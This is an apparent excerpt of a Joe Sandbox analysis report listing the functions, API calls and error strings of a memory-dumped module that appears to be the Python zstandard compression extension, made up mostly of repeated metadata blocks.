                                                                                                                                                                                                            • Instruction ID: 4fa80835ef680603d24adfe9c1120d9cce908c495165e1a023cef0e6ab4e3684
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 942da154b746fd8199c0830da1f4d3ef868b4fa211f6350233e4324c2f322fcd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33914822A0AA42A5EF109FA1E9542BC33A0FB58BD8F414132CD4E57BA4DF7CE559D318
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_funcfree$malloc$fflushfprintfmemmove$ConditionCriticalSectionVariableWake$EnterLeavememset
                                                                                                                                                                                                            • String ID: Failed to allocate buffers: out of memory$Failed to allocate dmer map: out of memory$Failed to select dictionary
                                                                                                                                                                                                            • API String ID: 2308072146-2024679854
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mem_SubtypeType_$Arg_Err_FreeInfoKeywords_MallocMemoryParseSizeSystemTuple
                                                                                                                                                                                                            • String ID: O|i:multi_compress_to_buffer$argument must be list of BufferWithSegments$item %zd not a bytes like object$no source elements found$source elements are empty
                                                                                                                                                                                                            • API String ID: 870350789-2088052565
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$Arg_Buffer_Bytes_Err_FreeFromKeywords_Mem_ParseReleaseSizeTuple
                                                                                                                                                                                                            • String ID: cannot use a decompressobj multiple times$y*:decompress$zstd decompressor error: %s
                                                                                                                                                                                                            • API String ID: 1012876292-1685517491
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_Buffer_Err_Keywords_ParseReleaseSizeStringTuple
                                                                                                                                                                                                            • String ID: could not determine content size in frame header$decompression error: %s$decompression error: decompressed %zu bytes; expected %llu$decompression error: did not decompress full frame$error determining content size from frame header$frame is too large to decompress on this platform$y*|n:decompress
                                                                                                                                                                                                            • API String ID: 3686958272-2450312357
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_FormatInfoKeywords_ParseSizeStringSystemTuple
                                                                                                                                                                                                            • String ID: cannot define compression_params and threads$cannot define compression_params and write_checksum$cannot define compression_params and write_content_size$cannot define compression_params and write_dict_id$compression_params must be zstd.ZstdCompressionParameters$could not load compression dictionary: %s$could not set compression parameters: %s$dict_data must be zstd.ZstdCompressionDict$level must be less than %d$|iOOOOOi:ZstdCompressor
                                                                                                                                                                                                            • API String ID: 1701209533-1797388729
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A80028BC
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A80028CC
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A800290B
                                                                                                                                                                                                            • memmove.VCRUNTIME140 ref: 00007FF8A8002943
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C63
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002C79
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C81
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C8A
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002E13
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003A99
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003AA5
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003AF5
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003B5A
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003B63
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A8002A44
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A8002A61
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002A71
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A8002A7B
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A8002A84
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002A8D
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 00007FF8A8002AA8
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002AD8
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002AE1
                                                                                                                                                                                                            • WakeConditionVariable.KERNEL32 ref: 00007FF8A8002B00
                                                                                                                                                                                                            • memmove.VCRUNTIME140 ref: 00007FF8A8002B16
                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32 ref: 00007FF8A8002B44
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 00007FF8A8002B4D
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002B5A
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002B63
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002B6C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$__acrt_iob_func$malloc$memmove$ConditionCriticalSectionVariableWakefflushfprintf$EnterLeavecalloc
                                                                                                                                                                                                            • String ID: Failed to allocate buffers: out of memory$Failed to select dictionary
                                                                                                                                                                                                            • API String ID: 185317096-2728481001
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$Err_$Arg_Bytes_DeallocFromKeywords_ParseSizeTuple
                                                                                                                                                                                                            • String ID: compressor object already finished$error ending compression stream: %s$flush mode not recognized$unhandled flush mode$|i:flush
                                                                                                                                                                                                            • API String ID: 3471821988-3489195408
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$Err_Object_Size$CallDeallocFormatMethod_RestoreSaveString$Arg_AttrFromKeywords_Long_ParseSsize_tTuple
                                                                                                                                                                                                            • String ID: flush$flush$stream is closed$unknown flush_mode: %d$write$zstd compress error: %s$|I:flush
                                                                                                                                                                                                            • API String ID: 3954421489-341752428
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mem_$FreeSize$Arg_Err_InfoKeywords_List_MallocMemoryParseSystemTuple
                                                                                                                                                                                                            • String ID: cannot train dict: %s$nO!|IIIdIIIiIi:train_dictionary$samples must be bytes
                                                                                                                                                                                                            • API String ID: 3778040872-2048232659
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String$Arg_Keywords_ParseSizeTuple
                                                                                                                                                                                                            • String ID: cannot read negative amounts less than -1$readall$stream is closed
                                                                                                                                                                                                            • API String ID: 1444107868-4172326129
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C63
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002C79
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C81
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C8A
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002D75
                                                                                                                                                                                                            • clock.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002D7F
                                                                                                                                                                                                            • clock.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002D9D
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002DC0
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002DD3
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002DDD
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002DE6
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002E13
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002E2A
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002E34
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002E3D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fflushfprintf$clock$memmove
                                                                                                                                                                                                            • String ID: %79s$%u%% $Breaking content into %u epochs of size %u
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Mem_$Eval_FreeFromLong_SizeThread$Arg_Buffer_CallDeallocFormatKeywords_MallocMemoryMethod_Object_ParseReleaseRestoreSaveSize_tSsize_tStringTuplememmove
                                                                                                                                                                                                            • String ID: stream is closed$write$y*:write$zstd decompress error: %s
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$DeallocSizeString$Bytes_RestoreSave$CallErr_FromMethod_Object_
                                                                                                                                                                                                            • String ID: error ending compression stream: %s$output flushed$read$zstd compress error: %s$zstd compress error: %s
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String$Arg_Keywords_ParseSizeTuple
                                                                                                                                                                                                            • String ID: cannot read negative amounts less than -1$error ending compression stream: %s$readall$stream is closed
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_Eval_StringThread$Arg_Buffer_Err_FromKeywords_ParseReleaseResizeRestoreSaveSizeTuplememmove
                                                                                                                                                                                                            • String ID: cannot call compress() after compressor finished$y*:compress$zstd compress error: %s
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$Buffer_Err_ReleaseRestoreSaveString$Bytes_FormatFromSize
